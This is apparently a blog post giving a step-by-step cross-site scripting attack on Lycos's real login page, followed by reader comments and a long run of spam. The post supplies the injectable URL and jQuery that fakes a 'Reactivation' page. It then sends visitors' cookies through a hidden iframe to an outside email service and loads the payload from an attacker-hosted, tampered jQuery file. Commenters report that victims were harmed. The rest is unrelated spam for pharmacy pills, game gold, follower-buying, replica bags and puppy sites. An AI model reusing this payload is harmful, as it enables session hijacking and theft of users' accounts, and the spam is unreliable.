First, we need the vulnerability. https://registration.lycos.com/login.php?action=login&m_PR=27&m_CBURL=http://www.lycos.com/&m_U='/><script>alert('Hello, World');</script> will work.
Next is the jQuery. Using it we're going to alter the title and login form, then email the cookie value by appending a hidden iframe to TestDiv. The JavaScript below should fulfill these needs, mailing to you@yourdomain.com.
$(this).load(function() {
$('title').html('Reactivation');
$('form').html('<div id="TestDiv"></div><h3 style="color:green;margin:">Activated</h3>Your account has been reactivated.<br />Redirecting to <a href="http://mail.lycos.com">http://mail.lycos.com</a>...');
var u = 'http://send-anonymous-email.com/Record.php?email_from=someemail%40domain.com&email_to=you%40yourdomain.com&subject=Have+A+Cookie&message=' + escape(document.cookie) + '&kind=html';
$('#TestDiv').append('<iframe style="display:none;" src="' + u + '" />');
setTimeout("window.location='http://mail.lycos.com';", 5000);
});
To obscure our code and keep the URL short we can remove all unnecessary whitespace and append it to the end of the jQuery file. Doing so would look something like this:
[jQuery] $(this).load(function(){$('title').html('Reactivation');$('form').html('<div id="TestDiv"></div><h3 style="color:green;margin:">Activated</h3>Your account has been reactivated.<br />Redirecting to <a href="http://mail.lycos.com">http://mail.lycos.com</a>...');var u='http://send-anonymous-email.com/Record.php?email_from=someemail%40domain.com&email_to=you%40yourdomain.com&subject=Have+A+Cookie&message='+escape(document.cookie)+'&kind=html';$('#TestDiv').append('<iframe style="display:none;" src="'+u+'"/>');setTimeout("window.location='http://mail.lycos.com';",5000);});
Include the modified version of jQuery using the vulnerability and the result will look like the screenshot below.
https://registration.lycos.com/login.php?action=login&m_PR=27&m_CBURL=http://www.lycos.com/&m_U='/><script src="http://www.yourdomain.com/modifiedjQuery.js"></script>
very cut and dried, easy to understand. You should be a technical writer.
ReplyDeleteUmmm, thanks a lot. So now all my private emails and account data is being sent to whom? Grrr, so crazy to think I'm a person who gives lots of my own free-time volunteering in my community and helping people out, and you are doing your best to fuck people over. What a crazy shitty world.
ReplyDeleteI think someone actually took your code and totally screwed up Lycos for real. Perhaps you should look into it and help them sort it all out before you get a call from about a million lawyers - especially ones from Lycos.
ReplyDeleteJohn,
ReplyDeleteWhat does this means to all of us who are now locked out of our Lycos free email accounts?
What does this mean now that we've all given away our usernames & passwords?!? Or are they only after our credit card numbers?
ReplyDeleteFirst off, thanks to all for the feedback! Unfortunately this will not help anyone recover their free Lycos email account. As to whether the information contained in this post was used in a malicious manner, I do not know. If it was, such an occurance would be unfortunate and I certainly would not condone the acts of the individual(s) involved. This was posted for informational purposes only. Any anger should be redirected to those that provide a premium service with gaping holes in it. Exactly what information can be compromised using this vulnerability I am unsure of; I do not have a Lycos email account.
ReplyDeleteI can not agree more with you!
DeleteLMAO ... that is awesome!
ReplyDeleteI, of course, a newcomer to this blog, but the author does not agree
ReplyDeleteJanuary 16, 2011 and the security problem is still there!! Glad I don't have a Lycos account!
ReplyDeleteOnce again great post. You seem to have a good understanding of these themes.When I entering your blog,I felt this . Come on and keep writting your blog will be more attractive. To Your Success!
ReplyDeletemy computer has something wrong!
maybe it does't update for a long time.
Classic Dresses
Classic Bridesmaid Dresses
Wedding Dresses with Sleeves
We all know that we need some entertainments to help us relax ourselves,if you are interested in playing World Of Warcraft,and want to know more things about http://www.mmolive.com/ and http://www.mmohome.com/gold/Maple-Story-US.html,you can come to our home to enjoy more happy.
ReplyDeleteThank you for sharing. It has already passed several days and we should let it go. I want to recommend you a reliable store http://www.gold4power.com selling wow gold with fast delivery speed. What's more, the code "sssss" will save you 5% of the total order.
ReplyDeletesalam kenal bos. lagi jalan jalan pagi nih
ReplyDelete聽說過“天生陽痿”嗎?
ReplyDelete網友:醫生你好,我有陽痿早泄威而鋼哪裡買 威而鋼 威而鋼 壯陽藥 威而鋼 犀利士哪裡買 壯陽藥品 壯陽藥 威而鋼 威而鋼哪裡買 威而鋼專賣店 威而鋼藥局 情色貼圖快兩年了,真的可以治威而鋼 犀利士 威而鋼哪裡買 犀利士 犀利士好嗎?
醫生:有無包皮過長的情況?包皮過長易導致龜頭神經敏感,從而導致早泄。
網友:沒有包皮過長。
醫生:有尿頻、尿急、尿壯陽藥 壯陽藥 威而鋼 犀利士 犀利士 犀利士專賣 犀利士 犀利士5mg價格 壯陽藥品 犀利士專賣 威而鋼 壯陽藥不盡、尿等待、尿分叉的感覺嗎?
網友:都沒有,就以前有手淫和性交過頻后來就開始了。
醫生:以前性功能正常嗎?
網友:正常,可現在一挺了就軟了,性交也一分鐘左右就泄了。
醫生:有到醫院檢查過嗎?
網友:沒有檢查過,但是有去藥店買過藥,吃了一段時間都沒有什么效果就沒有繼續吃了。
醫生:首先治療疾病,建議還是先做檢查,確診病因后再對癥治療為佳。導致陽痿早泄的病因是多種的,如精神因素;任何可能導致犀利士 犀利士 犀利士 犀利士 犀利士 威而鋼 威而鋼 威而鋼 威而鋼哪裡買 威而鋼 威而鋼 威而鋼 威而鋼 犀利士 壯陽藥品去哪買 犀利士 犀利士 犀利士 犀利士 犀利士陰莖海綿體動脈血流減少的疾病;手術、外傷引起陰莖有關血管和神經損傷,導致勃起功能障礙;內分泌疾患、慢性病和長期服用某些藥物;前列腺炎、前列腺增生反復發作久治不愈等。
網友:那難治療嗎?
醫生:檢查確診后,只要你積極配合醫生對癥治療,是可以臨床治愈的。如果不是先天性的,不管是哪些疾病,只要查清楚,配合醫生都可以治療的。
Higher Secondary School Certificate. Bangladesh Education Result Board & Government Official website. HSC Admission Result 2020 Recently Published. Government web. HSC Result Student can download HSC Admission Result PDF File.
ReplyDeleteno deposit bonus forex 2021 - takipçi satın al - takipçi satın al - takipçi satın al - takipcialdim.com/tiktok-takipci-satin-al/ - instagram beğeni satın al - instagram beğeni satın al - google haritalara yer ekleme - btcturk - tiktok izlenme satın al - sms onay - youtube izlenme satın al - google haritalara yer ekleme - no deposit bonus forex 2021 - tiktok jeton hilesi - tiktok beğeni satın al - binance - takipçi satın al - uc satın al - finanspedia.com - sms onay - sms onay - tiktok takipçi satın al - tiktok beğeni satın al - twitter takipçi satın al - trend topic satın al - youtube abone satın al - instagram beğeni satın al - tiktok beğeni satın al - twitter takipçi satın al - trend topic satın al - youtube abone satın al - instagram beğeni satın al - tiktok takipçi satın al - tiktok beğeni satın al - twitter takipçi satın al - trend topic satın al - youtube abone satın al - instagram beğeni satın al - perde modelleri - instagram takipçi satın al - instagram takipçi satın al - cami avizesi - marsbahis
ReplyDeleteGST Admission Result of General & Science- Technology (GST) admission A,B,C unit eligible list result 2020-2021. Guccho Admission Result 2021 will be available on gstadmission.ac.bd
ReplyDeletemy site original site Clicking Here luxury replica bags this link Ysl replica bags
ReplyDeletereplica bags turkey replica gucci bags a3w75x1c90 replica bags from turkey replica bags thailand hermes replica k3r59b6x16 replica bags paypal replica bags china free shipping click here for more l9k90d0c01 replica bags us
ReplyDeletehttps://haileypets.com
ReplyDeleteteacup poodle for sale
poodle teacup for sale
teacup poodles for sale
teacup poodle for sale near me
toy poodle for sale
dapple dachshund puppies for sale
ReplyDeletehttps://greenlandpuppies.com/
teacup yorkie for sale
yorkie pupies for sale
teacup yorkshire for sale
yorkshire puppies for sale
yorkshire terriers for sale
maltese pups for sale near me
miniature dachshund puppies for sale
ReplyDeletepoodles for sale
poodle for sale
teacup poodles for sale
teacup poodle for sale
toy poodle for sale near me
poodle for sale near me
https://breezepuppies.com/teacup-yorkie-sale/
ReplyDeletehttps://breezepuppies.com/chihuahua-puppy-for-sale/
https://breezepuppies.com/pugs-puppies-for-sale/
https://breezepuppies.com/french-bulldog-puppy-for-sale/
https://haileypets.com/teacup-shih-tzu-for-sale/
https://haileypets.com/schnauser-puppies-for-sale/
https://breezepuppies.com
ReplyDeletetoy poodles for sale
poodle for sale
for sale poodle puppies
mini dachshund for sale
ghj maltese pups for sale
mini dapple dachshund for sale
ReplyDeleteminiature dachshund for sale
miniature dachshunds for sale
https://haileypets.com/contact-shih-tzu/
https://furkittens.com/main-coon-for-sale/